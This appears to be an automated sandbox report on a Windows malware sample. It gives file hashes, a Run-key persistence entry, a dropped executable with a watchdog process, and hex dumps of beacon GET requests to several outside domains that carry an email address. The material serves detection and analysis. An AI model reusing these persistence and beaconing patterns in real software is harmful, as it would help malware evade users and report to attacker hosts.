Analysis Date2015-05-13 00:34:57

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: c4a2971f6da6fa3e45be3b379cc09482 sha1: 6d2a068f60f65ee4d79dacffc763ac6d3d5f4cff size: 299520
Section.rdata md5: d0eb82adc2a6a47a332583fbfb5ef01f sha1: e6610f4cde5dbf76faa6fe3e49ef1ba8d383b8fb size: 34304 md5: badb731b7727363c356fb68b22c091d7 sha1: 05250feec4ca5b5a5a7b7e7847e72d1899b50540 size: 102912
Timestamp2014-10-30 10:05:52
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Mapper Copy Multimedia Keying Portable Security ➝
C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe

↳ C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\xmlxswi.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.lor
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\fmpczfwjxzbkjel\nkdbrzxgcib.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20666c69 65726265 666f7265   ost: flierbefore
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 206e6967 68747370 72696e67   ost: nightspring
0x00000080 (00128)   2e6e6574 0d0a0d0a                     .net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20636170 7461696e 73756363   ost: captainsucc
0x00000080 (00128)   6573732e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20656c65 63747269 63737072   ost: electricspr
0x00000080 (00128)   696e672e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20747261 64657370 72696e67   ost: tradespring
0x00000080 (00128)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20737472 65657473 75636365   ost: streetsucce
0x00000080 (00128)   73732e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20737472 65657462 616e6b65   ost: streetbanke
0x00000080 (00128)   722e6e65 740d0a0d 0a0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20626574 74657273 75636365   ost: bettersucce
0x00000080 (00128)   73732e6e 65740d0a 0d0a0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d736e69 62736d75 72646f72   mail=snibsmurdor
0x00000020 (00032)   40766f64 61666f6e 65656d61 696c2e63   @vodafoneemail.c
0x00000030 (00048)   6f2e756b 266d6574 686f643d 706f7374
0x00000040 (00064)   266c656e 20485454 502f312e 300d0a41   &len HTTP/1.0..A
0x00000050 (00080)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000060 (00096)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000070 (00112)   6f73743a 20717569 65747375 63636573   ost: quietsucces
0x00000080 (00128)   732e6e65 740d0a0d 0a0a0a    

00-+ CC
         (((((                  H
         h((((                  H
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
h_	J4b
invalid string position
j h@YE
kt TDs
-@lN f
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
+t HHt
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
< tK<	tG
TLOSS error
 Type Descriptor'
*	UC}(
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
v	N+D$
z] F[]'